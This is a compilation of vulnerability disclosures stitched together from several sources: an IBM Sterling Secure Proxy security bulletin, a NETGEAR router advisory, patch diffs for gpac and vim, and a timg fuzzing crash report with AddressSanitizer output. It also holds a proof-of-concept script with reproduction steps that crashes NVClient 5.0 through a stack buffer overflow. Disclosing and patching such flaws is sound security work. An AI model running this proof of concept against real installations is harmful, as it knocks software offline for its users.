IBM Sterling Secure Proxy and IBM Sterling External Authentication Server 6.0.3 and 6.1.0 stores user credentials in plain clear text which can be read by a local user with container access.  IBM X-Force ID:  255585.

  

**Summary**

Multple vulnerabilities affect IBM Sterling Secure Proxy and are addressed in the latest release and iFix

**Vulnerability Details**

**CVEID:**   CVE-2023-26048  
**DESCRIPTION:**   Eclipse Jetty is vulnerable to a denial of service, caused by an out of memory flaw in the HttpServletRequest.getParameter() or HttpServletRequest.getParts() function. By sending a specially crafted multipart request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253356 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2023-26049  
**DESCRIPTION:**   Eclipse Jetty could allow a remote authenticated attacker to obtain sensitive information, caused by a flaw during nonstandard cookie parsing. By sending a specially crafted request to tamper with the cookie parsing mechanism, an attacker could exploit this vulnerability to obtain values from other cookies, and use this information to launch further attacks against the affected system.  
CVSS Base score: 4.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253355 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-24998  
**DESCRIPTION:**   Apache Commons FileUpload and Tomcat are vulnerable to a denial of service, caused by not limit the number of request parts to be processed in the file upload function. By sending a specially-crafted request with series of uploads, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/247895 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-32338  
**DESCRIPTION:**   IBM Sterling Secure Proxy and IBM Sterling External Authentication Server stores user credentials in plain clear text which can be read by a local user with container access.  
CVSS Base score: 5.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/255585 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-21930  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE, Oracle GraalVM Enterprise Edition related to the JSSE component could allow an unauthenticated attacker to cause high confidentiality impact and high integrity impact.  
CVSS Base score: 7.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253115 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)

**CVEID:**   CVE-2021-33813  
**DESCRIPTION:**   JDOM is vulnerable to a denial of service, caused by an XXE issue in SAXBuilder. By sending a specially-crafted HTTP request, a remote attacker could exploit this vulnerability to cause the a denial of service.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/203804 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2023-22874  
**DESCRIPTION:**   IBM MQ Clients 9.2 CD, 9.3 CD, and 9.3 LTS are vulnerable to a denial of service attack when processing configuration files. IBM X-Force ID: 244216.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/244216 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-40609  
**DESCRIPTION:**   IBM SDK, Java Technology Edition 7.1.5.18 and 8.0.8.0 could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By sending specially-crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 236069.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236069 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-40149  
**DESCRIPTION:**   jettison-json Jettison is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending a specially-crafted XML or JSON data, a remote authenticated attacker could exploit this vulnerability to causes the parser to crash, and results in a denial of service condition.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236352 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-40150  
**DESCRIPTION:**   jettison-json Jettison is vulnerable to a denial of service, caused by an out of memory flaw. By sending a specially-crafted XML or JSON data, a remote authenticated attacker could exploit this vulnerability to causes the parser to crash, and results in a denial of service condition.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236353 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-45685  
**DESCRIPTION:**   Jettison is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending an overly long string using JSON data, a remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/242596 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-45693  
**DESCRIPTION:**   Jettison is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending a specially-crafted request using the map parameter, a remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/242274 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2023-1436  
**DESCRIPTION:**   Jettison is vulnerable to a denial of service, caused by an infinite recursion when constructing a JSONArray from a Collection that contains a self-reference in one of its elements. A remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/250490 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Sterling Secure Proxy

6.0.3

IBM Sterling Secure Proxy

6.1.0

**Remediation/Fixes**

**Product**

**Version**

**iFix**

**Remediation**

IBM Sterling Secure Proxy

6.1.0

GA

Fix Central

IBM Sterling Secure Proxy

6.0.3

iFix 08

Fix Central

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

31 Aug 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS6PNW","label":"IBM Sterling Secure Proxy"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"},{"code":"PF051","label":"Linux on IBM Z Systems"},{"code":"PF033","label":"Windows"}\],"Version":"6.0.3, 6.1.0","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}}\]

CVE-2023-32338: Security Bulletin: IBM Sterling Secure Proxy is vulnerable to multiple issues

NVClient version 5.0 suffers from a stack buffer overflow vulnerability.

    # Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS)# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 2023-08-19# Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar# Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20Software(V5.0).pdf# Vulnerability Type: Buffer Overflow Local# Tested On: Windows 10 64bit# Tested Version: 5.0# Steps to Reproduce:# 1- Run the python script and create exploit.txt file# 2- Open the application and log in# 3- Click the "Config" button in the upper menu# 4- Click the "User" button just below it# 5- Now click the "Add users" button in the lower left# 6- Fill in the Username, Password, and Confirm boxes# 7- Paste the characters from exploit.txt into the Contact box# 8- Click OK and crash!#!/usr/bin/env python3exploit = 'A' * 846try:    with open("exploit.txt","w") as file:        file.write(exploit)    print("POC is created")except:    print("POC not created")

NVClient 5.0 Stack Buffer Overflow

Stack-based Buffer Overflow in GitHub repository gpac/gpac prior to 2.3-DEV.

Expand Up

@@ -134,24 +134,31 @@ static GF\_Err gf\_bt\_report(GF\_BTParser \*parser, GF\_Err e, char \*format, ...)

  

void gf\_bt\_check\_line(GF\_BTParser \*parser)

{

while (1) {

reload\_line:

while (parser\->line\_pos < parser\->line\_size) {

switch (parser\->line\_buffer\[parser\->line\_pos\]) {

case ' ':

case '\\t':

case '\\n':

case '\\r':

parser\->line\_pos++;

continue;

case '\\0':

parser\->line\_pos \= parser\->line\_size;

default:

break;

}

break;

}

  

if (parser\->line\_buffer\[parser\->line\_pos\]\=='#') {

parser\->line\_size \= parser\->line\_pos;

if (parser\->line\_pos < parser\->line\_size) {

if (parser\->line\_buffer\[parser\->line\_pos\]\=='#') {

parser\->line\_size \= parser\->line\_pos;

}

else if ((parser\->line\_buffer\[parser\->line\_pos\]\=='/') && (parser\->line\_buffer\[parser\->line\_pos+1\]\=='/') ) {

parser\->line\_size \= parser\->line\_pos;

}

}

else if ((parser\->line\_buffer\[parser\->line\_pos\]\=='/') && (parser\->line\_buffer\[parser\->line\_pos+1\]\=='/') ) parser\->line\_size \= parser\->line\_pos;

  

if (parser\->line\_size \== parser\->line\_pos) {

/\*string based input - done\*/

Expand Down Expand Up

@@ -405,10 +412,15 @@ void gf\_bt\_check\_line(GF\_BTParser \*parser)

}

}

if (!parser\->line\_size) {

if (!gf\_gzeof(parser\->gz\_in)) gf\_bt\_check\_line(parser);

else parser\->done \= 1;

if (!gf\_gzeof(parser\->gz\_in))

//avoid recursion

goto reload\_line;

else

parser\->done \= 1;

}

else if (!parser\->done && (parser\->line\_size \== parser\->line\_pos)) gf\_bt\_check\_line(parser);

else if (!parser\->done && (parser\->line\_size \== parser\->line\_pos))

//avoid recursion

goto reload\_line;

}

  

void gf\_bt\_force\_line(GF\_BTParser \*parser)

Expand Down

CVE-2023-4756: Fixed #2584 · gpac/gpac@6914d01

In gnss service, there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08044040; Issue ID: ALPS08044035.

CVE-2023-32817: September 2023

A vulnerability was found in Tenda AC8 16.03.34.06_cn_TDC01. It has been declared as critical. Affected by this vulnerability is the function formSetDeviceName. The manipulation leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-238633 was assigned to this vulnerability.

CVE-2023-4744

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1331.

CVE-2023-4751

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1848.

Expand Up @@ -6,7 +6,7 @@ CheckScreendump  
func Test\_crash1() " The following used to crash Vim let opts \= #{wait\_for\_ruler: 0} let opts \= #{wait\_for\_ruler: 0, rows: 20} let args \= ' -u NONE -i NONE -n -e -s -S ' let buf \= RunVimInTerminal(args .. ' crash/poc\_huaf1', opts) call VerifyScreenDump(buf, 'Test\_crash\_01', {}) Expand All @@ -22,4 +22,13 @@ func Test\_crash1()  
endfunc  
func Test\_crash2() " The following used to crash Vim let opts \= #{wait\_for\_ruler: 0, rows: 20} let args \= ' -u NONE -i NONE -n -e -s -S ' let buf \= RunVimInTerminal(args .. ' crash/vim\_regsub\_both', opts) call VerifyScreenDump(buf, 'Test\_crash\_01', {}) exe buf .. "bw!" endfunc  
" vim: shiftwidth\=2 sts\=2 expandtab

CVE-2023-4738: patch 9.0.1848: [security] buffer-overflow in vim_regsub_both() · vim/vim@ced2c73

Buffer Overflow vulnerability in NETGEAR R6400v2 before version 1.0.4.118, allows remote unauthenticated attackers to execute arbitrary code via crafted URL to httpd.

Was this article helpful?   Yes     No

Associated CVE IDs: None

First published: 2023-03-15

NETGEAR has released fixes for a pre-authentication buffer overflow security vulnerability on the following product models:

*   CBR40 fixed in firmware version 2.5.0.24
*   LAX20 fixed in firmware version 1.1.6.34
*   MK62 fixed in firmware version 1.1.6.122
*   MR60 fixed in firmware version 1.1.6.122
*   MS60 fixed in firmware version 1.1.6.122
*   RBW30 fixed in firmware version 2.6.2.6
*   R6400 fixed in firmware version 1.0.1.70
*   R6400v2 fixed in firmware version 1.0.4.118
*   R6700v3 fixed in firmware version 1.0.4.118
*   R7000 fixed in firmware version 1.0.11.130
*   R7000P fixed in firmware version 1.3.3.148
*   RAX200 fixed in firmware version 1.0.4.120
*   RAX75 fixed in firmware version 1.0.4.120
*   RAX80 fixed in firmware version 1.0.4.120
*   RS400 fixed in firmware version 1.5.1.86

NETGEAR strongly recommends that you download the latest firmware as soon as possible.

**To download the latest firmware for your NETGEAR product:**

1.  Visit NETGEAR Support.
2.  Start typing your model number in the search box, then select your model from the drop-down menu as soon as it appears.  
    If you do not see a drop-down menu, make sure that you entered your model number correctly, or select a product category to browse for your product model.
3.  Click **Downloads**.
4.  Under **Current Versions**, select the download whose title begins with **Firmware Version**.
5.  Click **Download**.
6.  Follow the instructions in your product’s user manual, firmware release notes, or product support page to install the new firmware.

****Disclaimer****

This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information in the document or materials linked from the document is at your own risk. NETGEAR reserves the right to change or update this document at any time. NETGEAR expects to update this document as new information becomes available.

The pre-authentication buffer overflow vulnerability remains if you do not complete all recommended steps. NETGEAR is not responsible for any consequences that could have been avoided by following the recommendations in this notification.

****Acknowledgements****

Swings from Chaitin Security Research Lab

****Common Vulnerability Scoring System****

CVSS Rating: Medium

CVSS Score: 6.5

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

****Best Practices for Updating Firmware****

We recommend that you keep your NETGEAR devices up to date with the latest firmware. Firmware updates contain security fixes, bug fixes, and new features for your NETGEAR products.

If your product is supported by one of our apps, using the app is the easiest way to update your firmware:

*   Orbi products: NETGEAR Orbi app
*   NETGEAR WiFi routers: NETGEAR Nighthawk app
*   Some NETGEAR Business products: NETGEAR Insight app (firmware updates through the app are available only for Insight subscribers)

If your product is not supported by one of our apps, you can always update your firmware manually by following the instructions in your product’s user manual, firmware release notes, or product support page. For more information, see Where can I find information about my NETGEAR product?.

****Contact****

We appreciate and value having security concerns brought to our attention. NETGEAR constantly monitors for both known and unknown threats. Being pro-active rather than re-active to emerging security issues is fundamental for product support at NETGEAR.

It is NETGEAR's mission to be the innovative leader in connecting the world to the internet. To achieve this mission, we strive to earn and maintain the trust of those that use NETGEAR products for their connectivity.

To report a security vulnerability, visit http://www.netgear.com/about/security/. 

If you are a NETGEAR customer with a security-related support concern, you can contact NETGEAR customer support at techsupport.security@netgear.com. 

****Revision History****

2023-03-15: Published advisory

2023-06-15: Updated Acknowledgements section

Last Updated:06/15/2023 | Article ID: 000065571

**Was this article helpful?**Yes No

**This article applies to:**

*   Wireless AX Router Nighthawk (WiFi 6) (3)
    *   RAX200
    *   RAX75
    *   RAX80
*   Nighthawk WiFi Systems (3)
    *   MK62
    *   MR60
    *   MS60
*   Wireless AC Router Nighthawk (4)
    *   R6700v3
    *   R7000
    *   R7000P
    *   RS400
*   Mobile Router (1)
    *   LAX20
*   Wireless AC Router (2)
    *   R6400
    *   R6400v2
*   Orbi (2)
    *   CBR40
    *   RBW30

How to Find Your Model Number  
**Read this article in another language:**

**Looking for more about your product?**

Get information, documentation, videos and more for your specific product.

**Need to Contact NETGEAR Support?**

With NETGEAR’s round-the-clock premium support, help is just a phone call away.

**Complimentary Support**

NETGEAR provides complimentary technical support for NETGEAR products for 90 days from the original date of purchase.

Contact Support

**NETGEAR Premium Support**

**GearHead Support for Home Users**

GearHead Support is a technical support service for NETGEAR devices and all other connected devices in your home. Advanced remote support tools are used to fix issues on any of your devices. The service includes support for the following:

*   Desktop and Notebook PCs, Wired and Wireless Routers, Modems, Printers, Scanners, Fax Machines, USB devices and Sound Cards
*   Windows Operating Systems (2000, XP or Vista), MS Word, Excel, PowerPoint, Outlook and Adobe Acrobat
*   Anti-virus and Anti-Spyware: McAfee, Norton, AVG, eTrust and BitDefender

Learn More

**ProSUPPORT Services for Business Users**

NETGEAR ProSUPPORT services are available to supplement your technical support and warranty entitlements. NETGEAR offers a variety of ProSUPPORT services that allow you to access NETGEAR's expertise in a way that best meets your needs:

*   Product Installation
*   Professional Wireless Site Survey
*   Defective Drive Retention (DDR) Service

Learn More

CVE-2023-36187: Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2020-0578

Buffer Overflow vulnerability in hzeller timg v.1.5.2 and before allows a remote attacker to cause a denial of service via the 0x61200000045c address.

**I use afl++ fuzzing this program**

    export CC=/usr/bin/clang
    export CXX=/usr/bin/clang++
    cmake -B build && cmake --build build
    ➜  src ./timg --version
    timg 1.5.1+  <https://timg.sh/>
    Copyright (c) 2016..2023 Henner Zeller. This program is free software; license GPL 2.0.
    
    Image decoding GraphicsMagick 1.3.38 (2022-03-26)
    Turbo JPEG
    QOI Image reader
    STB image loading fallback
    Video decoding libav 58.76.100
    Half, quarter, iterm2, and kitty encoding timg builtin.
    Libsixel version 1.8.6
    

then build afl++ run this poc

    =================================================================
    ==2368346==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200000045c at pc 0x00000051d18e bp 0x7fff288903e0 sp 0x7fff288903d8
    WRITE of size 4 at 0x61200000045c thread T0
        #0 0x51d18d in void timg::StoreBacking<2>(timg::rgba_t*, timg::rgba_t const*, timg::rgba_t const*) /home/xxx/timg-1.5.1/src/unicode-block-canvas.cc:145:20
        #1 0x51d18d in char* timg::UnicodeBlockCanvas::AppendDoubleRow<2, 24>(char*, int, int, timg::rgba_t const*, timg::rgba_t const*, bool, int*) /home/xxx/timg-1.5.1/src/unicode-block-canvas.cc:305:9
        #2 0x518011 in timg::UnicodeBlockCanvas::Send(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration) /home/xxx/timg-1.5.1/src/unicode-block-canvas.cc:374:23
        #3 0x5126c6 in timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)::operator()(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&) const /home/xxx/timg-1.5.1/src/renderer.cc:50:22
        #4 0x5126c6 in void std::__invoke_impl<void, timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration>(std::__invoke_other, timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int&&, int&&, timg::Framebuffer const&, timg::SeqType&&, timg::Duration&&) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:61:14
        #5 0x5126c6 in std::enable_if<__and_<std::is_void<void>, std::__is_invocable<timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration> >::value, void>::type std::__invoke_r<void, timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration>(timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int&&, int&&, timg::Framebuffer const&, timg::SeqType&&, timg::Duration&&) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:154:7
        #6 0x5126c6 in std::_Function_handler<void (int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration), timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)>::_M_invoke(std::_Any_data const&, int&&, int&&, timg::Framebuffer const&, timg::SeqType&&, timg::Duration&&) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/std_function.h:290:9
        #7 0x5730d7 in std::function<void (int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration)>::operator()(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration) const /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/std_function.h:590:9
        #8 0x5730d7 in timg::STBImageSource::SendFrames(timg::Duration const&, int, int const volatile&, std::function<void (int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration)> const&) /home/xxx/timg-1.5.1/src/stb-image-source.cc:163:13
        #9 0x4e10eb in PresentImages(std::vector<std::future<timg::ImageSource*>, std::allocator<std::future<timg::ImageSource*> > >*, timg::DisplayOptions const&, timg::PresentationOptions const&, timg::BufferedWriteSequencer*, bool*) /home/xxx/timg-1.5.1/src/timg.cc:373:17
        #10 0x4e10eb in main /home/xxx/timg-1.5.1/src/timg.cc:960:5
        #11 0x7fa43c829d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
        #12 0x7fa43c829e3f in __libc_start_main csu/../csu/libc-start.c:392:3
        #13 0x426ee4 in _start (/home/xxx/timg-1.5.1/afl/src/timg+0x426ee4)
    
    0x61200000045c is located 0 bytes to the right of 284-byte region [0x612000000340,0x61200000045c)
    allocated by thread T0 here:
        #0 0x4a40c3 in __interceptor_realloc (/home/xxx/timg-1.5.1/afl/src/timg+0x4a40c3)
        #1 0x5179a8 in timg::UnicodeBlockCanvas::RequestBuffers(int, int) /home/xxx/timg-1.5.1/src/unicode-block-canvas.cc:424:42
        #2 0x5179a8 in timg::UnicodeBlockCanvas::Send(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration) /home/xxx/timg-1.5.1/src/unicode-block-canvas.cc:322:26
        #3 0x5126c6 in timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)::operator()(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&) const /home/xxx/timg-1.5.1/src/renderer.cc:50:22
        #4 0x5126c6 in void std::__invoke_impl<void, timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration>(std::__invoke_other, timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int&&, int&&, timg::Framebuffer const&, timg::SeqType&&, timg::Duration&&) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:61:14
        #5 0x5126c6 in std::enable_if<__and_<std::is_void<void>, std::__is_invocable<timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration> >::value, void>::type std::__invoke_r<void, timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration>(timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)&, int&&, int&&, timg::Framebuffer const&, timg::SeqType&&, timg::Duration&&) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:154:7
        #6 0x5126c6 in std::_Function_handler<void (int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration), timg::(anonymous namespace)::SingleColumnRenderer::render_cb(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)::'lambda'(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration const&)>::_M_invoke(std::_Any_data const&, int&&, int&&, timg::Framebuffer const&, timg::SeqType&&, timg::Duration&&) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/std_function.h:290:9
        #7 0x5730d7 in std::function<void (int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration)>::operator()(int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration) const /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/std_function.h:590:9
        #8 0x5730d7 in timg::STBImageSource::SendFrames(timg::Duration const&, int, int const volatile&, std::function<void (int, int, timg::Framebuffer const&, timg::SeqType, timg::Duration)> const&) /home/xxx/timg-1.5.1/src/stb-image-source.cc:163:13
        #9 0x4e10eb in PresentImages(std::vector<std::future<timg::ImageSource*>, std::allocator<std::future<timg::ImageSource*> > >*, timg::DisplayOptions const&, timg::PresentationOptions const&, timg::BufferedWriteSequencer*, bool*) /home/xxx/timg-1.5.1/src/timg.cc:373:17
        #10 0x4e10eb in main /home/xxx/timg-1.5.1/src/timg.cc:960:5
        #11 0x7fa43c829d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/xxx/timg-1.5.1/src/unicode-block-canvas.cc:145:20 in void timg::StoreBacking<2>(timg::rgba_t*, timg::rgba_t const*, timg::rgba_t const*)
    Shadow bytes around the buggy address:
      0x0c247fff8030: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
      0x0c247fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c247fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
      0x0c247fff8060: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c247fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c247fff8080: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
      0x0c247fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==2368346==ABORTING

CVE-2023-40968: Detected Crash: AddressSanitizer: heap-buffer-overflow · Issue #115 · hzeller/timg

